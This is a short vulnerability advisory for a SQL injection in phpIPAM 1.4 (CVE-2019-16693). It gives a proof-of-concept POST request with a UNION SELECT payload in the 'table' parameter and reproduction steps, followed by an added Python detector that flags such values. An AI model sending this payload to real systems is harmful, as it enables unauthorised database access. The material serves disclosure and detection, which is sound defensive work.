# Exploit Title: phpIPAM 1.4 - SQL Injection
# Date: 2025-11-25
# Exploit Author: CodeSecLab
# Vendor Homepage: https://github.com/phpipam/phpipam/
# Software Link: https://github.com/phpipam/phpipam/
# Version: 1.4
# Tested on: Windows
# CVE : CVE-2019-16693

Proof Of Concept
# Ensure you have a valid user session before executing the PoC.
POST /app/admin/custom-fields/order.php HTTP/1.1
Host: phpipam
Content-Type: application/x-www-form-urlencoded
Cookie: PHPSESSID=

table=test_table%60+UNION+SELECT+1%2C2%2C3+--+&current=non-empty&next=non-empty&action=add

Steps to Reproduce
1. Log in as an admin user.
2. Intercept and send the malicious request using a web proxy tool such as Burp Suite, ensuring it includes a valid session cookie.
3. Observe the result.
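
A defender-side check for the request shape shown in the PoC, as an added example that is not part of the original advisory or of phpIPAM's code: it flags POST bodies sent to this endpoint whose `table` value is not a plain identifier. The identifier pattern, the function names and the sample requests are assumptions constructed for illustration.

```python
import re
from urllib.parse import parse_qs

# Path and parameter name are taken from the PoC request above.
ENDPOINT = "/app/admin/custom-fields/order.php"
PARAM = "table"
# Assumption: a legitimate table name is a plain SQL identifier.
IDENTIFIER = re.compile(r"[A-Za-z0-9_]{1,64}")


def suspicious_table_values(path, body):
    """Return decoded `table` values that are not plain identifiers."""
    if path.split("?", 1)[0] != ENDPOINT:
        return []
    # parse_qs percent-decodes once and turns '+' into a space; a
    # double-encoded backtick (%2560) is left as '%60' and still fails
    # the identifier check because '%' is not an allowed character.
    params = parse_qs(body, keep_blank_values=True)
    return [v for v in params.get(PARAM, []) if not IDENTIFIER.fullmatch(v)]


def scan(requests):
    """Return (index, value) for every flagged request in a capture."""
    return [(i, v) for i, (path, body) in enumerate(requests)
            for v in suspicious_table_values(path, body)]


# Constructed sample capture: (path, urlencoded POST body).
SAMPLE = [
    (ENDPOINT, "table=custom_table&current=custom_a&next=custom_b&action=add"),
    (ENDPOINT, "table=test_table%60+UNION+SELECT+1%2C2%2C3+--+"
               "&current=non-empty&next=non-empty&action=add"),
    (ENDPOINT, "table=users%2560&current=a&next=b&action=add"),
    ("/app/admin/users/edit.php", "table=x%60&action=add"),
]

if __name__ == "__main__":
    for index, value in scan(SAMPLE):
        print(f"request {index}: non-identifier table value {value!r}")
```

The same identifier check, applied server-side before the value reaches a query, rejects the PoC body; in a proxy or WAF log pipeline it serves as a detection for this endpoint.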